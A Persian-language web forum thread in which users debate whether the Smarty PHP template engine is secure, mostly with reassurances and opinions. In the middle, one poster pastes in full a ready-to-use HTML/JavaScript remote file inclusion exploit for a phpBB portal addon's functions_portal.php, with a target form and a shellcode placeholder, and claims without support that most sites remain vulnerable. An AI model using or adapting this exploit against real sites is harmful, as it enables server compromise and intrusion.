اسمارتی امنیت داره؟

navidba

Well-Known Member
داره ولی ...پورت باز حساس زیاد داره با :
1 دقیقه میشه پورت باز پیدا کرد ولی در کل به طراحی بستگی داره...
 
navidba یعنی باگش مشکل امنیتی به حساب میاد یا مشکل در سایت؟

phpbb va vbulletin و ... که از این سیستم استفاده میکنن چی؟
 

alireza82

Well-Known Member
سرچ
شناخته شده هاش حل شدند! تیم اسمارتی تیم قوی ای هست که php.net هم پشتشونه! اونقدر ها هم داغون نیستند ، اما مثل هر نرم افزاری باگ دارن که حلشون میکنن! انقدر ها هم بی انصاف نباشید!
دوستانی هم که میگن آره زیاد ، خفن ! باگ هایی که کشف کردن و بزارن اینجا ما هم ببینیم ، اگر لطف کنن ریپورت بدن هم ، من بجای پروژه اسمارتی ازشون تشکر میکنم! که اون ها رفعش کنن ، یا خودتون رفعش کنید آخه اسمارتی اپن سورس هست:D
این قضیه پورت باز رو هم میشه توضیح بدید! ولی جالبه! پورت اونم اسمارتی؟! ربطش و نمی فهمم؟!! لطفا توضیح بدید منم بفهمم چیه و چه جوریه!
 
آخرین ویرایش:
firebird من هم میخوام استفاده کنم.
این باگی که میگی کم تر از بقیه داره خطر ناکه؟



میدونم که باگ زیاد داره ولی منظورم از باگ ، باگهای خطرناکه که یه طوری به هک کردن سایت کمک کنه ???
 
آخرین ویرایش:

navidba

Well-Known Member
اینم آخرین اکسپلویت کشف شده از phpbb که هنوز روی 70% سایت ها باز هست...:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<title>Fishing Cat Portal Addon (functions_portal.php) Remote File Inclusion Exploit</title>

<script language="JavaScript">

//'Bug found and Exploit coded by bd0rk
//'Vendor: http://www.foxymods-phpbb.com/
//'Download: http://www.foxymods-phpbb.com/download.php?id=7
//'Contact: bd0rk[at]hackermail.com

//'Vulnerable Code in line 21: include_once($phpbb_root_path . 'includes/lite.'.$phpEx);
//'$phpbb_root_path is not declared before include
//'Greetings: str0ke, TheJT, rgod, Frauenarzt

//#The german Hacker bd0rk

var dir="/includes/"
var file="/functions_portal.php?"
var parameter ="phpbb_root_path="
var shell="Insert your shellcode here"

function command() {
if (document.rfi.target1.value==""){
alert("Exploit failed...");
return false;
}

rfi.action= document.rfi.target1.value+dir+file+parameter+shell;
rfi.submit();
}
</script>
</head>

<body bgcolor="#000000">
<center>

<p><b><font face="Verdana" size="2" color="#008000">Fishing Cat Portal Addon (functions_portal.php) Remote File Inclusion Exploit</font></b></p>

<p></p>
<form method="post" target="getting" name="rfi" onSubmit="command();">
<b><font face="Arial" size="1" color="#FF0000">Target:</font><font face="Arial" size="1" color="#808080">[http://[target]/[directory]</font><font color="#00FF00" size="2" face="Arial">
</font><font color="#FF0000" size="2">&nbsp;</font></b>
<input type="text" name="target1" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';"></p>
<p><input type="submit" value="Start" name="B1"><input type="reset" value="Delete" name="B2"></p>
</form>
<p><br>
<iframe name="getting" height="337" width="633" scrolling="yes" frameborder="0"></iframe>
</p>

<b><font face="Verdana" size="2" color="#008000">bd0rk</font></b></p>
</center>
</body>

</html>

تاریخ کشفش ماله 3 هفته پیش هست...
 
ولی ما که آخر ربط اسمارتی رو به پورت و ربطش به این اکسپلویت رو نفهمیدیم!
با تشکر از توضیحات کامل و بینقص شما!!
 
اطلاعاتی که من گرفتم:

تا به حال باگی که به هک کردن سایت کمک کنه نداشته
و
فقط باگ هایی داشته که توی برنامه یا درست اجرا نمیشد یه مشکل داشته
 

bishtar

Member
اسمارتی هم مثل بقیه پروژه های open source می تونه باگ و اشکال داشته باشه .
از لحاظ امنیتی مشکلی نداره من همه کارهایی که تا حالا انجام دادم با اسماتی بوده و تا حالا هم با مشکلی برخورد نکردم که ناشی از
اسمارتی باشه.
پس با خیال راحت ازش استفاده کنید و دردسر استفاده از فریم ورکهای دیگه رو بخودتون ندید.

- تا اونجا که من می دونم قالب انجمن phpbb رو با اسمارتی نساختن !!! بنابراین :
اینم آخرین اکسپلویت کشف شده از phpbb
چه ربطی به امنیت phpbb داره من بیخبرم
 

my friend

Member
اسمارتی هم مثل بقیه پروژه های open source می تونه باگ و اشکال داشته باشه .
لیسانس های کپی رایت و اپن سورس (انواع لیسانس های اپن سورس ، مثل gpl یا lgpl و غیره!) تنها حق استفاده و نشر نرم افزار رو به استفاده کننده میده و ربطی به افزایش و کاهش باگ نرم افزار نداره...

opensource.org
Open Source Licenses by Name
Open Source Licenses by Category
 

siavashmusic

Active Member
سلام

شما با کمال ارامش از اسمارتی استفاد کن و خیالت از نظر امنیت راحت باشه
مطلب اصلی اینه که بشه از امکانات اسمارتی استفاده کرد وگرنه دوتا Inclued و upper کردن نمیشه استفاده از اسمارتی
برید انطباق فریم ورک ها با اسمارتی رو بخونید تا به قدرت و انعطاف پذیری اسمارتی پی ببرید
یه سری مقاله واسه همین اسمارتی در بخش مقالات انجمن همین بخش نوشتم برخی از دوستان هم همیاری کردن و مطلب اضافه کردن مطالعه کن میتونه مفید باشه
 

جدیدترین ارسال ها

بالا